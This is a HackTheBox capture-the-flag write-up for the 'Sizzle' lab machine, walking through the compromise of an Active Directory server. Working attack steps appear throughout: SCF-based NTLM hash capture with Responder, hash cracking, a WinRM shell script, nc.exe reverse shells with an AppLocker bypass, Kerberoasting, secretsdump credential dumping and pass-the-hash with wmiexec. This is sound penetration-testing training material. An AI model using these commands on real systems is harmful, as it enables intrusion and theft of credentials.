HackTheBox - Sizzle - WriteUp

Information Card

Brief

This is my writeup for HackTheBox’s box called Sizzle which is a really good and challanging box that requires you to exploit an Active Directory server. This box starts with exploiting Samba with the help of SCF File Attack which when combined with Evil-WinRM gives us our first foothold. Following which we Kerberoast the server to get user.txt followed by getting the NTLM hash for Administrator and logging in via wmiexec.py.

Reconnaissance

I use a tool called nmapAutomator and it is something I can recommend, alternatively you can also use AutoRecon

Nmap Basic Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Nmap 7.80 scan initiated Mon Sep  7 19:36:12 2020 as: nmap -Pn -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269 -oN nmap/Basic_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.078s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2020-09-07T14:09:18+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/7%Time=5F563E61%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-07T14:08:40
|_ start_date: 2020-09-07T13:58:46

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 19:39:20 2020 -- 1 IP address (1 host up) scanned in 187.28 seconds

Nmap Higher Port Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# Nmap 7.80 scan initiated Mon Sep  7 20:05:25 2020 as: nmap -Pn -sCV -p5985,5986,9389,47001,49664,49665,49668,49669,49677,49686,49687,49690,49693,49705,49722,49741 -oN nmap/Full_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.086s latency).

PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
|_ssl-date: 2020-09-07T14:36:39+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open unknown
49705/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:06:39 2020 -- 1 IP address (1 host up) scanned in 73.91 seconds

Nmap UDP Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# Nmap 7.80 scan initiated Mon Sep  7 20:00:35 2020 as: nmap -Pn -sCVU --script vulners --script-args mincvss=7.0 -p53,123,61685,61961,62699,62958 -oN nmap/UDP_10.10.10.103.nmap 10.10.10.103
Nmap scan report for sizzle (10.10.10.103)
Host is up (0.080s latency).

PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
61685/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
61961/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62699/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
62958/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NBTSt
SF:at,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61685-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61961-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port62699-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port62958-UDP:V=7.80%I=7%D=9/7%Time=5F564421%P=x86_64-pc-linux-gnu%r(NB
SF:TStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAA\0\0!\0\x01");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 7 20:01:02 2020 -- 1 IP address (1 host up) scanned in 27.42 seconds

This box had many services running and looking at the type of services running my first hunch was that this is an Active Directory server but missing 88 port was odd to me. After getting some idea about the machine I started enumerating the box.

Enumeration

HTTP / HTTPS Enumeration

When I visited the https://sizzle.htb.local domain I was greeted with a GIF. I ran gobuster on these protocols in the background and carried on with my enumeration. I downloaded the GIF and used exiftool on the media to check for metadata.

Gobuster

Gobuster returned the result. gobuster-old -t 40 -u http://10.10.10.103 -x aspx,php -e -w $WORDLIST_COMMON -s 200,204,301,302,307,401

1
2
3
4
5
6
7
8
9
10
11
12
=====================================================
2020/09/10 11:54:55 Starting gobuster
=====================================================
http://10.10.10.103/Images (Status: 301)
http://10.10.10.103/aspnet_client (Status: 301)
http://10.10.10.103/certenroll (Status: 301)
http://10.10.10.103/certsrv (Status: 401)
http://10.10.10.103/images (Status: 301)
http://10.10.10.103/index.html (Status: 200)
=====================================================
2020/09/10 11:55:25 Finished
=====================================================

Visiting http://10.10.10.103/certsrv asked for credentials. So I moved to the next service, SMB in hopes of getting some credentials to login.

SMB

I then tried to access the SMB share anonymously and the server replied.

SMB Anonymous Login

Directories like CertEnroll, Department Shares, Operations looked interesting some are related to the directories we saw in our HTTP enumeration. To enumerate this further I mounted it to /mnt directory using the command sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt. Upon which enumerating became a tad bit easier.

I downloaded all the files from the ZZ_ARCHIVE. Comparing hashes of all the files made it clear all files were empty.

Finding unique files
1
find . -type f -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate

SMB Anonymous Login

Further file enumeration lead us to Users directory which had many potential usernames. We will write it to a file called usernames just incase if we have to bruteforce login.

Usernames

I then started looking at File Permissions of the directories and figured you can write to Public. Since we can now upload files to shares we can exploit this situation with SCF File Attack. Here we upload a Shell Command File with our path in IconFile to make the box request us for the resource upon which we can capture the NTLM hash.

FileSCF

Listening for NTLM hashes
1
responder -I tun0

Responder captured the NTLM hash of Amanda

We can now crack Amanda’s hash with hashcat -m 5600 hash.amanda /home/alpha/wordlist/rockyou.txt -O

Cracked Password of Amanda

LDAP

Using the obtained credentials I used them to see if LDAP could give us some more details about the machine. I used this to enumerate LDAP.

This did yield some useful results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=HTB,DC=LOCAL
CN=Configuration,DC=HTB,DC=LOCAL
CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
DC=DomainDnsZones,DC=HTB,DC=LOCAL
DC=ForestDnsZones,DC=HTB,DC=LOCAL
Supported controls:
1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT
1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT
1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT
1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT
1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT
1.2.840.113556.1.4.1852 - User quota - Control - MICROSOFT
1.2.840.113556.1.4.1907 - Server shutdown notify - Control - MICROSOFT
1.2.840.113556.1.4.1948 - Range retrieval no error - Control - MICROSOFT
1.2.840.113556.1.4.1974 - Server force update - Control - MICROSOFT
1.2.840.113556.1.4.2026 - Input DN - Control - MICROSOFT
1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT
1.2.840.113556.1.4.2065 - Show deactivated link - Control - MICROSOFT
1.2.840.113556.1.4.2066 - Policy hints [DEPRECATED] - Control - MICROSOFT
1.2.840.113556.1.4.2090 - DirSync EX - Control - MICROSOFT
1.2.840.113556.1.4.2204 - Tree deleted EX - Control - MICROSOFT
1.2.840.113556.1.4.2205 - Updates stats - Control - MICROSOFT
1.2.840.113556.1.4.2206 - Search hints - Control - MICROSOFT
1.2.840.113556.1.4.2211 - Expected entry count - Control - MICROSOFT
1.2.840.113556.1.4.2239 - Policy hints - Control - MICROSOFT
1.2.840.113556.1.4.2255 - Set owner - Control - MICROSOFT
1.2.840.113556.1.4.2256 - Bypass quota - Control - MICROSOFT
1.2.840.113556.1.4.2309
1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696
1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT
1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891
1.2.840.113556.1.4.474 - Sort Response - Control - RFC2891
1.2.840.113556.1.4.521 - Cross-domain move - Control - MICROSOFT
1.2.840.113556.1.4.528 - Server search notification - Control - MICROSOFT
1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT
1.2.840.113556.1.4.619 - Lazy commit - Control - MICROSOFT
1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
1.2.840.113556.1.4.802 - Range option - Control - MICROSOFT
1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT
1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT
1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT
2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF
2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF
Supported extensions:
1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT
1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT
1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589
1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513
1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532
Supported features:
1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT
1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT
1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT
1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT
1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT
1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT
Supported SASL mechanisms:
GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5
Schema entry:
CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
Other:
currentTime:
20200907163653.0Z
dsServiceName:
CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
defaultNamingContext:
DC=HTB,DC=LOCAL
schemaNamingContext:
CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
configurationNamingContext:
CN=Configuration,DC=HTB,DC=LOCAL
rootDomainNamingContext:
DC=HTB,DC=LOCAL
supportedLDAPPolicies:
MaxPoolThreads
MaxPercentDirSyncRequests
MaxDatagramRecv
MaxReceiveBuffer
InitRecvTimeout
MaxConnections
MaxConnIdleTime
MaxPageSize
MaxBatchReturnMessages
MaxQueryDuration
MaxDirSyncDuration
MaxTempTableSize
MaxResultSetSize
MinResultSets
MaxResultSetsPerConn
MaxNotificationPerConn
MaxValRange
MaxValRangeTransitive
ThreadMemoryLimit
SystemMemoryLimitPercent
highestCommittedUSN:
118875
dnsHostName:
sizzle.HTB.LOCAL
ldapServiceName:
HTB.LOCAL:[email protected]
serverName:
CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
isSynchronized:
TRUE
isGlobalCatalogReady:
TRUE
domainFunctionality:
7
forestFunctionality:
7
domainControllerFunctionality:
7

Once I had credentials I also used them to again to enumerate the service using ldapsearch -x -h sizzle.htb.local -D '[email protected]' -w 'Ashare1972' -b 'dc=htb,dc=local' and this which gave us users and their associated certificates. Moving on.

Exploitation

Generating Certificate

After cracking the password of Amanda I tried to login to the certificate authority with the freshly obtained credentials but the machine took an eternity to load the page. Anyhow after if loaded I saw the below page : -

Cracked Password of Amanda

Given this I generated keys for Amanda using openssl genrsa -aes256 -out amanda.key 2048 followed by a certificate signing request openssl req -new -key amanda.key -out amanda.csr. This article might prove useful. After this goto the HTTP Server and click Request a certificate > Advance Certificate Request > Submit the Certificate Signing Request content to the field of Saved Request and click Submit.

Request a Certificate

Submitting a Renewal Request

Download Issued Certificate

Evil-WinRM

Now with the help of EvilWinRM we can get a shell. We have modified the exploit a little bit to suit us.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new(
endpoint: 'https://sizzle.htb.local:5986/wsman',
transport: :ssl,
:client_cert => 'amanda.cer',
:client_key => 'amanda.key',
:key_pass => 'mysuperstrongpassword',
:no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end

This lands us a shell. We then transfer nc.exe with Invoke Web-Request to remote machine. This machine was very hardened and it was difficult to transfer files b/w this remote box and my box. Anyhow, once I transfered nc.exe due to group policy I was unable to get a reverse shell to the machine because of Group Policy. Upon some research I came across this repository called UltimateAppLockerByPassList particularly this page was interesting. Once I copied nc.exe to C:\Windows\Temp it gave me back a powershell’s reverse shell.

Privilege Escalation

Escalating to mrlky

Upon enumerating network I found port 88 which wasn’t visible in our nmap scans. To kerberoast I chose to use Rubeus because then I won’t have to port forward. I switched to my Windows 10 VM and compiled Rubeus via Visual Studio you can find a compiled version of the binary here.

Then, transferred the binary to the machine at location C:\Windows\Temp\. Upon issuing .\rub.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972 -> priv esc to another user it gave the NTLM hash for a user called mrlky.

Kerberoasting with Rubeus

Cracking this Hash with the help of hashcat gives us the password Football#7

Kerberoasting with Rubeus

Escalating to Administrator

With the help of recently obtained credentials of mrlky we can try to dump NTLM hashes of all users using secretsdump.py

Dumping NTLM hashes
1
secretsdump.py sizzle.htb.local/mrlky:Football#[email protected]

Hashdump

Since we have NTLM hash of the Adminstrator we can use it to gain command access to the machine using wmicexec.py. wmiexec.py -hashes xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [email protected]. I used this shell to get myself another powershell reverse shell.

root

Proof

Proof
1
echo "whoami"; whoami; echo "ifconfig"; ipconfig; echo "hostname"; hostname; echo "root.txt"; more C:\Users\Administrator\Desktop\root.txt; echo "user.txt" ; more C:\Users\mrlky\Desktop\user.txt

Say Cheese